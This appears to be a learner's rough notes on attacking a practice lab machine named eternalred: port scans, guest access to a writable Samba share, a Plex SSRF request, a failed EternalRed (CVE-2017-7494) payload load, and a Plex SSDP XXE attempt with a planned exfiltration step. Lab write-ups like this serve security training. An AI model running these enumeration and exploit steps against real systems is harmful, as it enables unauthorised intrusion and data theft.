MCO: 66
[pg mco eternalred 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:90:b3:38:35:a1:44:cf:4b:66:ea:7e:ca:97:07:72 (RSA)
| 256 14:e4:16:6f:95:32:67:13:85:40:21:a7:33:97:a8:4b (ECDSA)
|_ 256 d7:9b:e7:43:e0:75:a0:73:58:20:80:ab:87:00:4f:16 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: COMPUTADORA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h17m48s, deviation: 2h18m34s, median: -2m12s
| nbstat: NetBIOS name: COMPUTADORA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| COMPUTADORA<00> Flags: <unique><active>
| COMPUTADORA<03> Flags: <unique><active>
| COMPUTADORA<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: computadora
| NetBIOS computer name: COMPUTADORA\x00
| Domain name: \x00
| FQDN: computadora
|_ System time: 2020-05-21T21:34:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-22T01:34:31
|_ start_date: N/A
smbmap -u '' -p '' -H boron.pg
[+] Guest session IP: boron.pg:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
VIDZ READ, WRITE
IPC$ NO ACCESS IPC Service (computadora server (Samba, Ubuntu))
smbclient \\\\boron.pg\\VIDZ
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 21 18:51:50 2020
.. D 0 Fri Jun 8 12:19:05 2018
ThreeRapidRecoveries.mov N 27551090 Fri Jun 8 10:32:10 2018
revenge.mp4 N 11627238 Fri Jun 8 12:22:08 2018
mad-grapple-skillz+matt-the-whiner.m4v N 15323774 Fri Jun 8 12:21:46 2018
noobChainKill-small.mov N 10887584 Fri Jun 8 10:33:05 2018
lol-grapple-kill.m4v N 2305077 Fri Jun 8 12:21:17 2018
Application Support D 0 Mon Jun 4 20:07:26 2018
7139940 blocks of size 1024. 4816992 blocks available
smb: \>
can’t read the preferences file for ‘plex media server’ in ‘application support’
was looking like smb VIDZ is a dead end, so did nmap allports scan:
Discovered open port 1618/tcp on 172.16.10.66
new port appeared
1618/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
some exploits linked to that but doesn’t looking promising.
Discovered open port 32469/tcp on 172.16.10.66
another new port
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
also upnp platinum.
eh… i gotta try harder.
trying harder
…later
trying harder now
sudo mount -t cifs //172.16.10.66/VIDZ ./mnt
[sudo] password for kali:
Password for root@//172.16.10.66/VIDZ:
still no cigar with the smb. not much read/write permissions beyond the root VIDZ directory.
http://boron.pg:32400/web/index.html
https://www.exploit-db.com/exploits/31983
looked promising, but then when i try:
GET /system/proxy HTTP/1.1
Host: boron.pg
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
Connection: keep-alive
Content-Length: 0
i still get:
Plex is not reachable.
Make sure your server has an internet connection and any firewalls or other programs are set to allow access.
okay i may have something here that deals with samba 4.3.x exploit
smb: \> mkdir hello
smb: \> dir
. D 0 Fri May 22 02:43:21 2020
.. D 0 Fri Jun 8 12:19:05 2018
hello D 0 Fri May 22 02:43:21 2020
https://www.miltonsecurity.com/company/blog/eternalred-cve-2017-7494
writable…
smb: \hello\> put hello.txt
putting file hello.txt as \hello\hello.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \hello\> dir
. D 0 Fri May 22 02:49:14 2020
.. D 0 Fri May 22 02:43:21 2020
hello.txt A 4 Fri May 22 02:49:15 2020
7139940 blocks of size 1024. 4816304 blocks available
hm. getting this error although i can clearly see the file uploaded, and i can ‘get’ the file down to kali
[-] 172.16.10.66:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.16.10.66:445 - Loading the payload from server-side path /var/lib/plexmediaserver/Library/hello/TtvvGrSp.so using /var/lib/plexmediaserver/Library/hello/TtvvGrSp.so...
back to the plex: 1.13.0.5023-31d3c0c65 from GET /identity request
following https://www.exploit-db.com/exploits/45146
tried the ssdp way:
[XML REQUEST] Host: 172.16.10.66, User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
GET /ssdp/device-desc.xml
[XXE VULN!!!!] Host: 172.16.10.66, User-Agent: None
GET /ssdp/xxe.html
but didn’t get anything back on my netcat / smbserver.
to try: xxe exfil